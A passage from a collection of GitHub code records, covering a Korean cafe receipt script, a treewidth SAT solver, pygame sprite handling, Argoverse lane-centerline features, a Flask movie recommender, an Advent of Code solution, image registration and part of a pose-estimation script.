curs.fetchall()\n print(src_result)\n return src_result\n except :\n print('there is wrong data, try again')\n\ninvo_notdone = True\n\nwhile invo_notdone:\n this_member = Payinfo()\n show_table = this_member.getdata()\n print(show_table)\n print('영수증을 검색하시겠습니까? Y or N')\n\n command = input('type user command: ')\n\n if command == 'y' or command == 'Y': # 2) find payinfo\n Pnumb = input('검색하고자 하는 주문번호를 입력하세요:')\n search_result = str(this_member.search_obj(Pnumb))\n search_result = search_result.strip('(,)')\n\n Pnumb = search_result.split(',')[0]\n\n ptime_slice = search_result.split('(')[1]\n ptime_list = ptime_slice.split('),')[0]\n ptime_list = ''.join(ptime_list)\n ptime_list_year = ''.join(ptime_list.split(',')[0])\n ptime_list_mon = ''.join(ptime_list.split(',')[1])\n ptime_list_day = ''.join(ptime_list.split(',')[2])\n ptime_list_hr = ''.join(ptime_list.split(',')[3])\n ptime_list_mn = ''.join(ptime_list.split(',')[4])\n Ptime = ptime_list_year+ ptime_list_mon + ptime_list_day + ptime_list_hr + ptime_list_mn\n\n pclass = ptime_slice.split('),')[1]\n pclass_list = pclass.strip(''' ',',\"' ''')\n if pclass_list.count('카드'):\n Pclass_card = pclass_list.split(',')[0]\n P_card = int(Pclass_card.split(':')[1])\n else:\n P_card = 0\n if pclass_list.count('현금'):\n if P_card != 0:\n Pclass_cash = pclass_list.split(',')[1]\n else:\n Pclass_cash = pclass_list.split(',')[0]\n P_cash = int(Pclass_cash.split(':')[1])\n else:\n P_cash = 0\n pay_total = P_card + P_cash\n tax = int(pay_total*0.1)\n ohne_zoll = pay_total - tax\n\n pmenu_ls = str(this_member.get_pmenu(Pnumb))\n pmenu_ls = pmenu_ls.strip('((\"\",),)')\n print(pmenu_ls)\n '''mns = pmenu_ls.split(',')\n for idx, val in enumerate(mns):\n if idx % 2 == 1:\n qt = []\n qt.append(val)\n else:\n mn = []\n val = val.strip(\"''\")\n mn.append(val)\n print(qt, mn)'''\n\n #get_mns()\n #pmenu_qt = pmenu_mn.split(',')[1]\n #print(pmenu_qt)\n '''상품명과 단가는 t_product에서 가져오고 수량은 payinfo에서 금액은 단가*수량\n 상품명 찾기:\n pmenu 리스트 각 요소의 앞쪽 두글자 앞에 M 을 붙여서 t_product 테이블에 검색 쿼리를 보내고\n 받아온 정보를 이름, 단가로 변수별로 나눠서 저장한다.\n 리스트 각 요소 , 뒤 숫자가 수량으로 저장되면 된다.\n 금액은 단가 * 수량\n 리스트로 만들어서 상품명 단가 수량 금액 \\n \n 문자열로 만들려면 마지막에 ''.join()'''\n\n print(\"\"\"\" \n 영\t \t 수\t\t 증\n \t동네카페 외대 본점\n인터넷:www.dongne-cafe.onilne\n주소: 서울시 동대문구 이문로 107\n사업자: 201-81-20323 대표: dmkim\nTEL: 02-2173-2216\tFAX: 02-2173-0114\n주문시간:\"\"\", Ptime, \"\"\"\n포스No:1\t담당자:카페4조\t 주문번호: \"\"\", Pnumb, \"\"\"\n--------------------------------------------\n상품명\t\t 단가 수량 금액\n--------------------------------------------\n\"\"\", pmenu_ls, \"\"\"\n\n--------------------------------------------\n카드계\t\t\t\t\t\t \"\"\", P_card, \"\"\"\n현금계\t\t\t\t\t \"\"\", P_cash, \"\"\"\n총판매계\t\t\t \"\"\", pay_total, \"\"\" \n--------------------------------------------\n과세상품금액\t\t\t\t \"\"\", ohne_zoll, \"\"\" \n부가가치세\t\t\t\t \"\"\", tax, \"\"\" \n--------------------------------------------\n\tVielen Dank! 
Wiedersehen!\n\t\n\"\"\")\n\n else:\n print('영수증 검색을 취소했습니다.')\n Invo_notdone = True","repo_name":"Tieo/hufPOS_module","sub_path":"InvoiceMaker.py","file_name":"InvoiceMaker.py","file_ext":"py","file_size_in_byte":5208,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"23897603203","text":"import subprocess\n\nimport ctw.c_lower_bound as clb\nimport ctw.c_upper_bound as cb\nimport tw_utils\nimport sys\nfrom ctw import c_sv as svc\nimport sys\nfrom pysat.solvers import Glucose3\n\n\ndef solve_c(g, c_vertices, tub, c_value):\n c_lb = clb.c_lower_bound(g, c_vertices)\n print(f\"C lower bound {c_lb}\")\n val = c_value - 1\n ordering = None\n\n while c_lb <= val < c_value:\n print(f\"\\nLooking for decomposition of width C: {val}\")\n\n enc = svc.CTwEncoding(c_vertices, val, g)\n enc.encode()\n enc.encode_card(tub)\n\n with Glucose3() as slv:\n slv.append_formula(enc.formula)\n result = slv.solve()\n if result:\n model = {abs(x): x > 0 for x in slv.get_model()}\n ordering = []\n\n for i in range(0, len(g.nodes)):\n pos = 0\n for j in ordering:\n if not model[enc._ord(j, i)]:\n break\n pos += 1\n\n ordering.insert(pos, i)\n\n # Translate encoder indexing\n ordering = [enc.nodes[x] for x in ordering]\n\n b, t, r = tw_utils.ordering_to_decomp(g, ordering)\n # Check actual size of decomposition and proceed accordingly\n tub = max(len(cb) - 1 for cb in b.values())\n knownc = max(len(cb & c_vertices) for cb in b.values())\n val = knownc - 1\n print(f\"Found decomposition of size {tub}, C: {knownc}\")\n sys.stdout.flush()\n else:\n print(\"Failed to find decomposition\")\n sys.stdout.flush()\n val += 1\n\n print(f\"\\nFound tree width {tub}, C: {knownc}\")\n sys.stdout.flush()\n return tub, ordering\n\n return val, tub, ordering\n\n\ndef solve(g, c_vertices, tub=None):\n if len(c_vertices) == 0:\n return -1, None\n print(f\"Graph has {len(g.nodes)} nodes, {len(g.edges)} edges and {len(c_vertices)} c-vertices\")\n\n tub2, c_val, ordering = cb.min_c(g, c_vertices)\n if tub is None or tub2 < tub:\n tub = tub2\n\n tub2, val, ordering2 = solve_c(g, c_vertices, tub, c_val)\n if ordering2 is not None:\n c_val = val\n tub = tub2\n ordering = ordering2\n\n print(f\"Upper bound C: {c_val}, tree width {tub}\")\n sys.stdout.flush()\n\n # For c-treewidth we have to find the optimal c-value\n tlb = 1\n cval = tub-1\n knownc = c_val\n\n while tlb <= cval < tub:\n print(f\"\\nLooking for decomposition of size {cval}, C: {c_val}\")\n enc = svc.CTwEncoding(c_vertices, c_val, g)\n enc.encode()\n enc.encode_card(cval)\n\n with Glucose3() as slv:\n slv.append_formula(enc.formula)\n result = slv.solve()\n if result:\n model = {abs(x): x > 0 for x in slv.get_model()}\n ordering = []\n\n for i in range(0, len(g.nodes)):\n pos = 0\n for j in ordering:\n if not model[enc._ord(j, i)]:\n break\n pos += 1\n\n ordering.insert(pos, i)\n\n # Translate encoder indexing\n ordering = [enc.nodes[x] for x in ordering]\n\n b, t, r = tw_utils.ordering_to_decomp(g, ordering)\n # Check actual size of decomposition and proceed accordingly\n tub = max(len(cb) - 1 for cb in b.values())\n knownc = max(len(cb & c_vertices) for cb in b.values())\n cval = tub - 1\n print(f\"Found decomposition of size {tub}, C: {knownc}\")\n sys.stdout.flush()\n else:\n print(\"Failed to find decomposition\")\n sys.stdout.flush()\n cval += 1\n tlb = cval\n\n print(f\"\\nFound tree width {tub}, C: {knownc}\")\n sys.stdout.flush()\n return tub, 
ordering\n","repo_name":"ASchidler/tw-sv","sub_path":"ctw/solve_ctw.py","file_name":"solve_ctw.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"33596664415","text":"import pygame\nimport time\npygame.init()\ndisplay_width = 900\ndisplay_height = 600\ngameDisplay = pygame.display.set_mode((display_width, display_height))\n\nclass Player:\n\n\tdef __init__(self, position, imglist, jumpsprite, fallsprite):\n\t\tself.xpos = position[0]\n\t\tself.ypos = position[1]\n\t\tself.imglist = imglist\n\t\tself.jumpsprite = jumpsprite\n\t\tself.fallsprite = fallsprite\n\t\tself.stillsprite = imglist[8]\n\t\tself.imgtrack = 0\n\t\tself.xvel = 0\n\t\tself.yvel = 0\n\t\tself.maxvel = 5\n\t\tself.flip = False\n\t\tself.jumping = False\n\t\tself.falling = False\n\t\tself.still = True\n\n\tdef place(self, posx, posy):\n\t\tif not self.jumping and not self.falling and not self.still:\n\t\t\tif not self.flip:\n\t\t\t\tgameDisplay.blit(self.imglist[self.imgtrack], (posx, posy))\n\t\t\t\tself.imgtrack = (self.imgtrack + 1) % len(self.imglist)\n\t\t\telse:\n\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.imglist[self.imgtrack], True, False), (posx, posy))\n\t\t\t\tself.imgtrack = (self.imgtrack + 1) % len(self.imglist)\n\t\telse:\n\t\t\tif self.still:\n\t\t\t\tif not self.flip:\n\t\t\t\t\tgameDisplay.blit(self.stillsprite, (posx, posy))\n\t\t\t\telse:\n\t\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.stillsprite, True, False), (posx, posy))\n\t\t\telif self.jumping:\n\t\t\t\tif not self.flip:\n\t\t\t\t\tgameDisplay.blit(self.jumpsprite, (posx, posy))\n\t\t\t\telse:\n\t\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.jumpsprite, True, False), (posx, posy))\n\t\t\telif self.falling:\n\t\t\t\tif not self.flip:\n\t\t\t\t\tgameDisplay.blit(self.fallsprite, (posx, posy))\n\t\t\t\telse:\n\t\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.fallsprite, True, False), (posx, posy))","repo_name":"andychau/Shooter","sub_path":"PlayerClass.py","file_name":"PlayerClass.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"25169179486","text":"\"\"\"This module is used for computing map features for motion forecasting baselines.\"\"\"\n\nfrom typing import Any, Dict, List, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom shapely.geometry import LineString, Point, Polygon\nfrom shapely.ops import cascaded_union\n\nfrom argoverse.map_representation.map_api import ArgoverseMap\nfrom argoverse.utils.centerline_utils import (\n get_nt_distance,\n remove_overlapping_lane_seq,\n)\nfrom argoverse.utils.mpl_plotting_utils import visualize_centerline\nfrom utils.baseline_config import (\n _MANHATTAN_THRESHOLD,\n _DFS_THRESHOLD_FRONT_SCALE,\n _DFS_THRESHOLD_BACK_SCALE,\n _MAX_SEARCH_RADIUS_CENTERLINES,\n _MAX_CENTERLINE_CANDIDATES_TEST,\n)\n\n\nclass MapFeaturesUtils:\n \"\"\"Utils for computation of map-based features.\"\"\"\n def __init__(self):\n \"\"\"Initialize class.\"\"\"\n self._MANHATTAN_THRESHOLD = _MANHATTAN_THRESHOLD\n self._DFS_THRESHOLD_FRONT_SCALE = _DFS_THRESHOLD_FRONT_SCALE\n self._DFS_THRESHOLD_BACK_SCALE = _DFS_THRESHOLD_BACK_SCALE\n self._MAX_SEARCH_RADIUS_CENTERLINES = _MAX_SEARCH_RADIUS_CENTERLINES\n self._MAX_CENTERLINE_CANDIDATES_TEST = _MAX_CENTERLINE_CANDIDATES_TEST\n\n def get_point_in_polygon_score(self, lane_seq: List[int],\n xy_seq: np.ndarray, city_name: str,\n avm: 
ArgoverseMap) -> int:\n \"\"\"Get the number of coordinates that lie insde the lane seq polygon.\n\n Args:\n lane_seq: Sequence of lane ids\n xy_seq: Trajectory coordinates\n city_name: City name (PITT/MIA)\n avm: Argoverse map_api instance\n Returns:\n point_in_polygon_score: Number of coordinates in the trajectory that lie within the lane sequence\n\n \"\"\"\n lane_seq_polygon = cascaded_union([\n Polygon(avm.get_lane_segment_polygon(lane, city_name)).buffer(0)\n for lane in lane_seq\n ])\n point_in_polygon_score = 0\n for xy in xy_seq:\n point_in_polygon_score += lane_seq_polygon.contains(Point(xy))\n return point_in_polygon_score\n\n def sort_lanes_based_on_point_in_polygon_score(\n self,\n lane_seqs: List[List[int]],\n xy_seq: np.ndarray,\n city_name: str,\n avm: ArgoverseMap,\n ) -> List[List[int]]:\n \"\"\"Filter lane_seqs based on the number of coordinates inside the bounding polygon of lanes.\n\n Args:\n lane_seqs: Sequence of lane sequences\n xy_seq: Trajectory coordinates\n city_name: City name (PITT/MIA)\n avm: Argoverse map_api instance\n Returns:\n sorted_lane_seqs: Sequences of lane sequences sorted based on the point_in_polygon score\n\n \"\"\"\n point_in_polygon_scores = []\n for lane_seq in lane_seqs:\n point_in_polygon_scores.append(\n self.get_point_in_polygon_score(lane_seq, xy_seq, city_name,\n avm))\n randomized_tiebreaker = np.random.random(len(point_in_polygon_scores))\n sorted_point_in_polygon_scores_idx = np.lexsort(\n (randomized_tiebreaker, np.array(point_in_polygon_scores)))[::-1]\n sorted_lane_seqs = [\n lane_seqs[i] for i in sorted_point_in_polygon_scores_idx\n ]\n sorted_scores = [\n point_in_polygon_scores[i]\n for i in sorted_point_in_polygon_scores_idx\n ]\n return sorted_lane_seqs, sorted_scores\n\n def get_heuristic_centerlines_for_test_set(\n self,\n lane_seqs: List[List[int]],\n xy_seq: np.ndarray,\n city_name: str,\n avm: ArgoverseMap,\n max_candidates: int,\n scores: List[int],\n ) -> List[np.ndarray]:\n \"\"\"Sort based on distance along centerline and return the centerlines.\n \n Args:\n lane_seqs: Sequence of lane sequences\n xy_seq: Trajectory coordinates\n city_name: City name (PITT/MIA)\n avm: Argoverse map_api instance\n max_candidates: Maximum number of centerlines to return\n Return:\n sorted_candidate_centerlines: Centerlines in the order of their score \n\n \"\"\"\n aligned_centerlines = []\n diverse_centerlines = []\n diverse_scores = []\n num_candidates = 0\n\n # Get first half as aligned centerlines\n aligned_cl_count = 0\n for i in range(len(lane_seqs)):\n lane_seq = lane_seqs[i]\n score = scores[i]\n diverse = True\n centerline = avm.get_cl_from_lane_seq([lane_seq], city_name)[0]\n if aligned_cl_count < int(max_candidates / 2):\n start_dist = LineString(centerline).project(Point(xy_seq[0]))\n end_dist = LineString(centerline).project(Point(xy_seq[-1]))\n if end_dist > start_dist:\n aligned_cl_count += 1\n aligned_centerlines.append(centerline)\n diverse = False\n if diverse:\n diverse_centerlines.append(centerline)\n diverse_scores.append(score)\n\n num_diverse_centerlines = min(len(diverse_centerlines),\n max_candidates - aligned_cl_count)\n test_centerlines = aligned_centerlines\n if num_diverse_centerlines > 0:\n probabilities = ([\n float(score + 1) / (sum(diverse_scores) + len(diverse_scores))\n for score in diverse_scores\n ] if sum(diverse_scores) > 0 else [1.0 / len(diverse_scores)] *\n len(diverse_scores))\n diverse_centerlines_idx = np.random.choice(\n range(len(probabilities)),\n num_diverse_centerlines,\n 
replace=False,\n p=probabilities,\n )\n diverse_centerlines = [\n diverse_centerlines[i] for i in diverse_centerlines_idx\n ]\n test_centerlines += diverse_centerlines\n\n return test_centerlines\n\n def get_candidate_centerlines_for_trajectory(\n self,\n xy: np.ndarray,\n city_name: str,\n avm: ArgoverseMap,\n viz: bool = False,\n max_search_radius: float = 50.0,\n seq_len: int = 50,\n max_candidates: int = 10,\n mode: str = \"test\",\n ) -> List[np.ndarray]:\n \"\"\"Get centerline candidates upto a threshold.\n\n Algorithm:\n 1. Take the lanes in the bubble of last observed coordinate\n 2. Extend before and after considering all possible candidates\n 3. Get centerlines based on point in polygon score.\n\n Args:\n xy: Trajectory coordinates, \n city_name: City name, \n avm: Argoverse map_api instance, \n viz: Visualize candidate centerlines, \n max_search_radius: Max search radius for finding nearby lanes in meters,\n seq_len: Sequence length, \n max_candidates: Maximum number of centerlines to return, \n mode: train/val/test mode\n\n Returns:\n candidate_centerlines: List of candidate centerlines\n\n \"\"\"\n # Get all lane candidates within a bubble\n curr_lane_candidates = avm.get_lane_ids_in_xy_bbox(\n xy[-1, 0], xy[-1, 1], city_name, self._MANHATTAN_THRESHOLD)\n\n # Keep expanding the bubble until at least 1 lane is found\n while (len(curr_lane_candidates) < 1\n and self._MANHATTAN_THRESHOLD < max_search_radius):\n self._MANHATTAN_THRESHOLD *= 2\n curr_lane_candidates = avm.get_lane_ids_in_xy_bbox(\n xy[-1, 0], xy[-1, 1], city_name, self._MANHATTAN_THRESHOLD)\n\n assert len(curr_lane_candidates) > 0, \"No nearby lanes found!!\"\n\n # Set dfs threshold\n traj_len = xy.shape[0]\n\n # Assuming a speed of 50 mps, set threshold for traversing in the front and back\n dfs_threshold_front = (self._DFS_THRESHOLD_FRONT_SCALE *\n (seq_len + 1 - traj_len) / 10)\n dfs_threshold_back = self._DFS_THRESHOLD_BACK_SCALE * (traj_len +\n 1) / 10\n\n # DFS to get all successor and predecessor candidates\n obs_pred_lanes: List[Sequence[int]] = []\n for lane in curr_lane_candidates:\n candidates_future = avm.dfs(lane, city_name, 0,\n dfs_threshold_front)\n candidates_past = avm.dfs(lane, city_name, 0, dfs_threshold_back,\n True)\n\n # Merge past and future\n for past_lane_seq in candidates_past:\n for future_lane_seq in candidates_future:\n assert (\n past_lane_seq[-1] == future_lane_seq[0]\n ), \"Incorrect DFS for candidate lanes past and future\"\n obs_pred_lanes.append(past_lane_seq + future_lane_seq[1:])\n\n # Removing overlapping lanes\n obs_pred_lanes = remove_overlapping_lane_seq(obs_pred_lanes)\n\n # Sort lanes based on point in polygon score\n obs_pred_lanes, scores = self.sort_lanes_based_on_point_in_polygon_score(\n obs_pred_lanes, xy, city_name, avm)\n\n # If the best centerline is not along the direction of travel, re-sort\n if mode == \"test\":\n candidate_centerlines = self.get_heuristic_centerlines_for_test_set(\n obs_pred_lanes, xy, city_name, avm, max_candidates, scores)\n else:\n candidate_centerlines = avm.get_cl_from_lane_seq(\n [obs_pred_lanes[0]], city_name)\n\n if viz:\n plt.figure(0, figsize=(8, 7))\n for centerline_coords in candidate_centerlines:\n visualize_centerline(centerline_coords)\n plt.plot(\n xy[:, 0],\n xy[:, 1],\n \"-\",\n color=\"#d33e4c\",\n alpha=1,\n linewidth=3,\n zorder=15,\n )\n\n final_x = xy[-1, 0]\n final_y = xy[-1, 1]\n\n plt.plot(\n final_x,\n final_y,\n \"o\",\n color=\"#d33e4c\",\n alpha=1,\n markersize=10,\n zorder=15,\n )\n plt.xlabel(\"Map X\")\n 
plt.ylabel(\"Map Y\")\n plt.axis(\"off\")\n plt.title(f\"Number of candidates = {len(candidate_centerlines)}\")\n plt.show()\n\n return candidate_centerlines\n\n def compute_map_features(\n self,\n agent_track: np.ndarray,\n obs_len: int,\n seq_len: int,\n raw_data_format: Dict[str, int],\n mode: str,\n ) -> Tuple[np.ndarray, Dict[str, Any]]:\n \"\"\"Compute map based features for the given sequence.\n\n If the mode is test, oracle_nt_dist will be empty, candidate_nt_dist will be populated.\n If the mode is train/val, oracle_nt_dist will be populated, candidate_nt_dist will be empty.\n\n Args:\n agent_track : Data for the agent track\n obs_len : Length of observed trajectory\n seq_len : Length of the sequence\n raw_data_format : Format of the sequence\n mode: train/val/test mode\n \n Returns:\n oracle_nt_dist (numpy array): normal and tangential distances for oracle centerline\n map_feature_helpers (dict): Dictionary containing helpers for map features\n\n \"\"\"\n # Get observed 2 secs of the agent\n agent_xy = agent_track[:, [raw_data_format[\"X\"], raw_data_format[\"Y\"]\n ]].astype(\"float\")\n agent_track_obs = agent_track[:obs_len]\n agent_xy_obs = agent_track_obs[:, [\n raw_data_format[\"X\"], raw_data_format[\"Y\"]\n ]].astype(\"float\")\n\n # Get API for Argo Dataset map\n avm = ArgoverseMap()\n\n city_name = agent_track[0, raw_data_format[\"CITY_NAME\"]]\n\n # Get candidate centerlines using observed trajectory\n if mode == \"test\":\n oracle_centerline = np.full((seq_len, 2), None)\n oracle_nt_dist = np.full((seq_len, 2), None)\n candidate_centerlines = self.get_candidate_centerlines_for_trajectory(\n agent_xy_obs,\n city_name,\n avm,\n viz=False,\n max_search_radius=self._MAX_SEARCH_RADIUS_CENTERLINES,\n seq_len=seq_len,\n max_candidates=self._MAX_CENTERLINE_CANDIDATES_TEST,\n )\n\n # Get nt distance for the entire trajectory using candidate centerlines\n candidate_nt_distances = []\n for candidate_centerline in candidate_centerlines:\n candidate_nt_distance = np.full((seq_len, 2), None)\n candidate_nt_distance[:obs_len] = get_nt_distance(\n agent_xy_obs, candidate_centerline)\n candidate_nt_distances.append(candidate_nt_distance)\n\n else:\n oracle_centerline = self.get_candidate_centerlines_for_trajectory(\n agent_xy,\n city_name,\n avm,\n viz=False,\n max_search_radius=self._MAX_SEARCH_RADIUS_CENTERLINES,\n seq_len=seq_len,\n mode=mode,\n )[0]\n candidate_centerlines = [np.full((seq_len, 2), None)]\n candidate_nt_distances = [np.full((seq_len, 2), None)]\n\n # Get NT distance for oracle centerline\n oracle_nt_dist = get_nt_distance(agent_xy,\n oracle_centerline,\n viz=False)\n\n map_feature_helpers = {\n \"ORACLE_CENTERLINE\": oracle_centerline,\n \"CANDIDATE_CENTERLINES\": candidate_centerlines,\n \"CANDIDATE_NT_DISTANCES\": candidate_nt_distances,\n }\n\n return oracle_nt_dist, map_feature_helpers\n","repo_name":"jagjeet-singh/argoverse-forecasting","sub_path":"utils/map_features_utils.py","file_name":"map_features_utils.py","file_ext":"py","file_size_in_byte":14206,"program_lang":"python","lang":"en","doc_type":"code","stars":228,"dataset":"github-code","pt":"36"} +{"seq_id":"6822986820","text":"from flask import Flask, jsonify, request\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport os\n\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n\ndf = pd.read_csv(\"all_movies.csv\")\n\nid = []\ntitle = []\ncorpus = []\ndetails_by_id = {}\n\nfor 
index, row in df.iterrows():\n id.append(str(row['id']))\n title.append(row['title'])\n corpus.append(row['corpus'])\n details_by_id[str(row['id'])] = {\n \"title\": row['title'], \"corpus\": row['corpus'], \"backdrop\": row['backdrop'], \"poster\": row['poster']}\n\nvectorizer = TfidfVectorizer()\ntfidf_matrix = vectorizer.fit_transform(corpus)\n\ngenres = {}\n\nfor root, dirs, files in os.walk(\"./genres\"):\n for file_name in files:\n genre = file_name[:-4]\n file_path = os.path.join(root, file_name)\n df = pd.read_csv(file_path)\n df = df.drop('corpus', axis=1)\n df = df.fillna('')\n data = df.to_dict('records')\n genres[genre] = data\n\n\ndef find_similar_corpus(query, tfidf_matrix):\n query_vector = vectorizer.transform([query])\n similarity_scores = cosine_similarity(query_vector, tfidf_matrix).flatten()\n sorted_indices = np.argsort(similarity_scores)[::-1]\n return sorted_indices, similarity_scores\n\n\ndef find_similar_movies(_ids, k):\n l = 4\n movies = []\n added_movie_ids = set(_ids)\n count = 0\n for _id in _ids:\n if count > 15:\n break\n _corpus = details_by_id[_id][\"corpus\"]\n indices, sim_scores = find_similar_corpus(_corpus, tfidf_matrix)\n for i in range(1, l):\n index = indices[i]\n movie_id = id[index]\n if movie_id and title[index] and movie_id not in added_movie_ids:\n count += 1\n added_movie_ids.add(movie_id)\n poster = details_by_id[movie_id][\"poster\"]\n backdrop = details_by_id[movie_id][\"backdrop\"]\n if not backdrop:\n backdrop = \"\"\n if not poster:\n poster = \"\"\n movies.append({\n \"id\": movie_id,\n \"title\": title[index],\n \"backdrop\": backdrop,\n \"poster\": poster\n })\n else:\n l += 1\n return movies\n\n\nall_movies = []\ndf2 = pd.read_csv(\"all_movies.csv\")\ndf2 = df2.drop('corpus', axis=1)\ndf2 = df2.fillna('')\ndata = df2.to_dict('records')\nall_movies = data\n\n\n@app.route(\"/\")\ndef index():\n return \"Welcome to movie recommender\"\n\n\n@app.route(\"/get_recommendations/<ids>/<k>\")\ndef similar_movies(ids, k):\n ids = ids.split(\"|\")\n sim_movies = find_similar_movies(ids, k)\n return jsonify(sim_movies)\n\n\n@app.route(\"/get_genre_movies/<genre>\")\ndef genre_movies(genre):\n return jsonify(genres[genre])\n\n\n@app.route(\"/get_all_movies\")\ndef get_all_movies():\n return jsonify(all_movies)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n# flask --app app.py --debug run\n","repo_name":"walker-617/Recommender-Engine","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"39579146339","text":"file = './2/input.txt'\nwith open(file) as fn:\n raw = fn.read()\n\nt = {\n \"A\": \"r\",\n \"X\": \"r\",\n \"B\": \"p\",\n \"Y\": \"p\",\n \"C\": \"s\",\n \"Z\": \"s\",\n}\n\np = {\n \"r\": 1,\n \"p\": 2,\n \"s\": 3,\n}\n\nw = {\n \"r\": \"p\",\n \"p\": \"s\",\n \"s\": \"r\",\n}\n\nl = {v: k for k, v in w.items()}\n\ndef score(a):\n r = p[a[1]]\n if a[0] == a[1]:\n return r + 3\n if w[a[0]] == a[1]:\n return r + 6\n return r\n\ndef transform(a):\n a[0] = t[a[0]]\n if a[1] == 'Y':\n a[1] = a[0]\n if a[1] == 'Z':\n a[1] = w[a[0]]\n if a[1] == 'X':\n a[1] = l[a[0]]\n return a\n\nparsed = [ score([ t[i] for i in ln.split(\" \") ]) for ln in raw.splitlines() 
]\nprint(sum(parsed))","repo_name":"PhilippLange/aoc_2022","sub_path":"02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"29450839101","text":"import cv2\nimport numpy as np\n\n\ndef image_registration(img_1_clr, img_2_clr, n=15000):\n img_1 = cv2.cvtColor(img_1_clr, cv2.COLOR_BGR2GRAY)\n img_2 = cv2.cvtColor(img_2_clr, cv2.COLOR_BGR2GRAY)\n height, width = img_2.shape\n\n # ORB detector\n orb_detector = cv2.ORB_create(n)\n\n kp1, d1 = orb_detector.detectAndCompute(img_1, None)\n kp2, d2 = orb_detector.detectAndCompute(img_2, None)\n\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matches = matcher.match(d1, d2)\n matches.sort(key=lambda x: x.distance)\n\n matches = matches[: int(len(matches) * 0.7)]\n no_of_matches = len(matches)\n\n p1 = np.zeros((no_of_matches, 2))\n p2 = np.zeros((no_of_matches, 2))\n\n for i in range(len(matches)):\n p1[i, :] = kp1[matches[i].queryIdx].pt\n p2[i, :] = kp2[matches[i].trainIdx].pt\n\n homography, mask = cv2.findHomography(p1, p2, cv2.RANSAC)\n\n crop_1 = cv2.warpPerspective(img_1_clr, homography, (width, height))\n crop_2 = img_2_clr\n\n return crop_1, crop_2\n","repo_name":"alexandraroots/post_stamps","sub_path":"image_registration.py","file_name":"image_registration.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"5926829549","text":"import os\nimport os.path as osp\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nimport random\nimport cv2\nimport argparse\nimport math\n\nimport tensorflow as tf\n\n# for tensorflow_cpn\nfrom config import cfg\nfrom dataset import Preprocessing\n\n# for keras_retinanet\nfrom keras_retinanet.utils.image import preprocess_image, resize_image\n\ndef draw_bounding_box(frame, person_dets):\n\n\tx, y, w, h = person_dets\n\n\ttop = max(0, np.floor(x + 0.5).astype(int))\n\tleft = max(0, np.floor(y + 0.5).astype(int))\n\tright = min(frame.shape[1], np.floor(x + w + 0.5).astype(int))\n\tbottom = min(frame.shape[0], np.floor(y + h + 0.5).astype(int))\n\n\tcv2.rectangle(frame, (top, left), (right, bottom), (255, 0, 0), 2)\n\n\ndef read_pb_return_tensors(graph, pb_file, return_elements):\n\n\twith tf.gfile.FastGFile(pb_file, 'rb') as f:\n\t\tfrozen_graph_def = tf.GraphDef()\n\t\tfrozen_graph_def.ParseFromString(f.read())\n\n\twith graph.as_default():\n\t\treturn_elements = tf.import_graph_def(frozen_graph_def,\n\t\t\t\t\t\treturn_elements=return_elements)\n\treturn return_elements\n\n\ndef crop(pose_img, person_dets):\n\n\t# cls_dets : x1, y1, x2, y2, score\n\tcls_dets = np.zeros((1, 4), dtype=np.float32)\n\t# test_data : x, y, w, h, score\n\ttest_data = np.zeros((1, 4), dtype=np.float32)\n\n\ttest_data[:] = person_dets[:]\n\n\tbbox = np.asarray(test_data[0])\n\tcls_dets[0, :4] = np.array([bbox[0], bbox[1], bbox[0] + bbox[2], bbox[1] + bbox[3]])\n\n\ttest_imgs = []\n\tdetails = []\n\n\t# cropping\n\ttest_img, detail = Preprocessing(pose_img, test_data[0], stage='test')\n\n\tdetails.append(detail)\n\n\tdetails = np.asarray(details).astype(np.float32)\n\n\tfeed = test_img\n\n\tdata = [feed.transpose(0, 2, 3, 1).astype(np.float32)]\n\n\treturn data, details\n\ndef keypoint_detection(res, details):\n\n\tflat = [0.0 for i in range(cfg.nr_skeleton * 2)]\n\tcls_skeleton = np.zeros((1, cfg.nr_skeleton, 3)).astype(np.float32)\n\tcrops = np.zeros((1, 
4)).astype(np.float32)\n\n\tres = res.transpose(0, 3, 1, 2)\n\n\t# single map\n\tr0 = res[0].copy()\n\tr0 /= 255.\n\tr0 += 0.5\n\n\tfor w in range(cfg.nr_skeleton):\n\t\tres[0, w] /= np.amax(res[0, w])\n\tborder = 10\n\tdr = np.zeros((cfg.nr_skeleton, cfg.output_shape[0] + 2 * border, cfg.output_shape[1] + 2 * border))\n\tdr[:, border:-border, border:-border] = res[:cfg.nr_skeleton].copy()\n\n\tfor w in range(cfg.nr_skeleton):\n\t\tdr[w] = cv2.GaussianBlur(dr[w], (21, 21), 0)\n\tfor w in range(cfg.nr_skeleton):\n\t\tlb = dr[w].argmax()\n\t\ty, x = np.unravel_index(lb, dr[w].shape)\n\t\tdr[w, y, x] = 0\n\t\tlb = dr[w].argmax()\n\t\tpy, px = np.unravel_index(lb, dr[w].shape)\n\t\ty -= border\n\t\tx -= border\n\t\tpy -= border + y\n\t\tpx -= border + x\n\t\tln = (px ** 2 + py ** 2) ** 0.5\n\t\tdelta = 0.25\n\t\tif ln > 1e-3:\n\t\t\tx += delta * px / ln\n\t\t\ty += delta * py / ln\n\t\tx 